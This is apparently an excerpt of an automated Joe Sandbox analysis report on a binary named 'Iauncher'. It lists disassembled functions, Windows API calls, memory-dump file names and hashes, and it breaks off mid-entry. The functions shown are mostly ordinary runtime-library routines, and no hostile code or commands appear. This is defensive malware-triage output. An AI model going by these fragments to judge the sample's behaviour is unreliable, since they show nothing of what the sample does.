TerminateProcess.KERNEL32(00000000,?,00F20E0D,00000000,00F1AAD2,?,?,A03C9F43,00F1AAD2,?), ref: 00F20E2B
ExitProcess.KERNEL32 ref: 00F20E3D

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 124113b8e807a0865acb4ad4205aef75d2bb12095c779c57359cfe69fb1d20a9
Instruction ID: 0d709948a0479dbd50820dcb9a2f55747c8f43a0278dea06ac78181253fe27e5
Opcode Fuzzy Hash: 124113b8e807a0865acb4ad4205aef75d2bb12095c779c57359cfe69fb1d20a9
Instruction Fuzzy Hash: A0D09E73100518BFCF052F60FD0D95D3F26AF543617054414BA495A132CF79B996FA50

Uniqueness

Uniqueness Score: -1.00%

Function 00F28126 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F27870: GetConsoleOutputCP.KERNEL32(A03C9F43,00000000,00000000,00000000), ref: 00F278D3

WriteFile.KERNEL32(?,00000000,?,00F3D558,00000000,0000000C,00000000,00000000,?,00000000,00F3D558,00000010,00F1F70D,00000000,00000000,00000000), ref: 00F2828F
GetLastError.KERNEL32(?,00000000), ref: 00F28299

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 340efd9a013c8147b0c60a81b909035e3ccdaf4007fc3f19de978cb20119d33f
Instruction ID: a024e8ca57083b4414dfd9598f37033684e695e50a445cee3d2b4d06829ac719
Opcode Fuzzy Hash: 340efd9a013c8147b0c60a81b909035e3ccdaf4007fc3f19de978cb20119d33f
Instruction Fuzzy Hash: DE61C471D05269AFDF11CFA8EC44BEE7BB9AF09354F144049E800AB292D735D902EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A0BA Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F29BEA: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00F29C15

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00F29F01,?,00000000,?,00000000,?), ref: 00F2A11B
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F29F01,?,00000000,?,00000000,?), ref: 00F2A15D

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: fcfd8c518dda5d21cb54bfb55ca893fc29dbeea141ced1f8c6980e5f7e300d42
Instruction ID: 468968a5d5fb021c3b8533638116f793e5e9fa338e1840801f5f37b84eadd5ef
Opcode Fuzzy Hash: fcfd8c518dda5d21cb54bfb55ca893fc29dbeea141ced1f8c6980e5f7e300d42
Instruction Fuzzy Hash: 42513870E003658FDB20CF75E8906AAFBF5FF81320F14446ED0868B291E6759946EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00F157BD Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Fputc.LIBCPMT ref: 00F15896

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: e754118b4613316843f6d887664ffb30d66388ceb11ba0cc3c16179f8a3b26d8
Instruction ID: 84fe127aa253ce7e8d1fe65ff2e9b0310898099063ebd0a416712a80aaa066e8
Opcode Fuzzy Hash: e754118b4613316843f6d887664ffb30d66388ceb11ba0cc3c16179f8a3b26d8
Instruction Fuzzy Hash: 8A418C36D01A1AEBCF15DF64C9809EDB7B8FF48734B184026E801A7640EB71ED81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F27D28 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00F28275,00000000,00000000,00000000,?,0000000C,00000000), ref: 00F27DC4
GetLastError.KERNEL32(?,00F28275,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00F3D558,00000010,00F1F70D,00000000,00000000), ref: 00F27DEA

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 43e24427a2a27d5d60f6156526d8eef935be3dee9b5d64fd8f3c9d7f811cde4f
Instruction ID: 0041e401648bfbe1ea4baadc730e537ccf024f7abcdfa4dbc63646cdaa3402bb
Opcode Fuzzy Hash: 43e24427a2a27d5d60f6156526d8eef935be3dee9b5d64fd8f3c9d7f811cde4f
Instruction Fuzzy Hash: 3E21B131A002299FCF19DF29EC80AEDB7BAFF48311F5440A9E906D7211D630AD42DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F256AA Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F256F6
GetFileType.KERNELBASE(00000000), ref: 00F25708

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: e072a07c387d0b07ce76e1aec9847544423027b7c2e6aed7d9a93342f52eb4ea
Instruction ID: 4328c88326ca3dee5b37947ef220e05dcb5260337179bc15a28e4414e21a9dd2
Opcode Fuzzy Hash: e072a07c387d0b07ce76e1aec9847544423027b7c2e6aed7d9a93342f52eb4ea
Instruction Fuzzy Hash: 4911B172A04F2586C7304A3EAC88626BE95AB56B30B38071AD5B6C75F1C630D886F651

Uniqueness

Uniqueness Score: -1.00%

Function 00F25E56 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00F26AA9,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00F25E8A
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00F26AA9,?,?,00000000,?,00000000), ref: 00F25EA8

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 61359a3cfb1e0683a2298bd73173cab565510cd3642a509743989d2928363090
Instruction ID: f12ccbd5928d5e4a74bf6290e0b93bf77dfb6a2863a3605c88466c624d71ed63
Opcode Fuzzy Hash: 61359a3cfb1e0683a2298bd73173cab565510cd3642a509743989d2928363090
Instruction Fuzzy Hash: 7AF03A3250092EBBCF126F90ED05DDE7F66EF48761F064110FA1869120C736D972BB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F29CBE Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00F29F0D,00F29F01,00000000), ref: 00F29CF0

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 97271037e3c6e5a77b8dd14daa8c86792e47aefed63a2d8f1c955ebada67a484
Instruction ID: 545a876e533af9ff4aae5431e067b60673fae9387687a910a875756d9ba504b8
Opcode Fuzzy Hash: 97271037e3c6e5a77b8dd14daa8c86792e47aefed63a2d8f1c955ebada67a484
Instruction Fuzzy Hash: 42517B719081689BDB218A28ED80BE67BB8EB45314F6405EDE1DAC7042C3B49D45FF20

Uniqueness

Uniqueness Score: -1.00%

Function 00F25A87 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d4057b70623bbad8e173207617e385ca785c9045ef0efbb8dcaeda0732e4be
Instruction ID: 5ac38d97dedc9150bc94671f3639567d7629e9d4a14de4c1d2e08caf9793e622
Opcode Fuzzy Hash: 05d4057b70623bbad8e173207617e385ca785c9045ef0efbb8dcaeda0732e4be
Instruction Fuzzy Hash: 9401F533B006399B9B16DE29FD91A5B3397ABC4B303184120F900DB194EA34D805EE80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F2C951 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00F2CC6F,00000002,00000000,?,?,?,00F2CC6F,?,00000000), ref: 00F2C9EA
GetLocaleInfoW.KERNEL32(?,20001004,00F2CC6F,00000002,00000000,?,?,?,00F2CC6F,?,00000000), ref: 00F2CA13
GetACP.KERNEL32(?,?,00F2CC6F,?,00000000), ref: 00F2CA28

Strings

ACP, xrefs: 00F2C96F
OCP, xrefs: 00F2C9A5

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f7a486a2a3a518ea03dd927430bc2e17e3c9a6a66afd8c84598dc51d143315b4
Instruction ID: 13b46624ac05ce6b957c40482fbde50a8a94347ac97e82a39cbfd424f66eec4a
Opcode Fuzzy Hash: f7a486a2a3a518ea03dd927430bc2e17e3c9a6a66afd8c84598dc51d143315b4
Instruction Fuzzy Hash: 05219072A00129AAD724DB64E901BAF76A6AF54BB0B568524E90ADB101F732DD80F7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F2CB26 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F2CC32
IsValidCodePage.KERNEL32(00000000), ref: 00F2CC7B
IsValidLocale.KERNEL32(?,00000001), ref: 00F2CC8A
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F2CCD2
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F2CCF1

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4a394f95b4676f9c1d613424c1aabfe156ebb7fce670c24b62aa21e136f21bf9
Instruction ID: 33e73a3b5681c86c3cfcc0d4abfafc2e8c3c468c5710b4a133b42e9612b199fd
Opcode Fuzzy Hash: 4a394f95b4676f9c1d613424c1aabfe156ebb7fce670c24b62aa21e136f21bf9
Instruction Fuzzy Hash: 5951A372E002299FDF20EFA5EC41BBE73B8AF04750F144469F904E7180DB74AA40ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C1C2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

GetACP.KERNEL32(?,?,?,?,?,?,00F217C6,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F2C283
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F217C6,?,?,?,00000055,?,-00000050,?,?), ref: 00F2C2AE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F2C411

Strings

utf8, xrefs: 00F2C380

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 40df8e4729c5f21c867b480dc4cfdafcd52849df5e23ca071dfa32c8e55320f3
Instruction ID: e7af0813cdb92f6098dd599ef173b2d3be7514b6297c421260be90a8be8c0734
Opcode Fuzzy Hash: 40df8e4729c5f21c867b480dc4cfdafcd52849df5e23ca071dfa32c8e55320f3
Instruction Fuzzy Hash: F171E871A04325AADB24EB74EC46BAE73A8AF44760F144429F905DB181EA78ED40E7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F24713 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F247A0

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
Instruction ID: aa17a2576a1e19ed9ef934f66a5cd0988b36b14778257547630353f499cdb4dd
Opcode Fuzzy Hash: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
Instruction Fuzzy Hash: 1AB17C32D002A59FDB15CF68D8817FEBFE5EF55310F14816AE815AB241D2B8AD41EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F16D9F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F16DAB
IsDebuggerPresent.KERNEL32 ref: 00F16E77
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F16E90
UnhandledExceptionFilter.KERNEL32(?), ref: 00F16E9A

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: cbf010093b1cc77e6e0bf52314c4cbbe0b362754dd017fd1ceddd654277f2e9f
Instruction ID: 2e95407157798d846d1d02aa10197dc23d4c70f3a3327a15ef9491a178fed069
Opcode Fuzzy Hash: cbf010093b1cc77e6e0bf52314c4cbbe0b362754dd017fd1ceddd654277f2e9f
Instruction Fuzzy Hash: EC31F6B5D052189BDF20DFA4DD897CDBBB8AF08350F1041AAE50CAB250EB74AA859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C5D5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C629
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C673
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C739

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 65e0a908a09a7a0302353338b56a6104fe60b95a940a383a11c01606762fa743
Instruction ID: 86291a5ea5b65a00ef50b0a14a1422b7f0e913f114986a983f21ab0ee98582a1
Opcode Fuzzy Hash: 65e0a908a09a7a0302353338b56a6104fe60b95a940a383a11c01606762fa743
Instruction Fuzzy Hash: BF6171719105279BEB28DF28EC82BAE77A8EF04720F108179ED05D6581E778D945EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F1AAD3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F1ABCB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F1ABD5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F1ABE2

Memory Dump Source

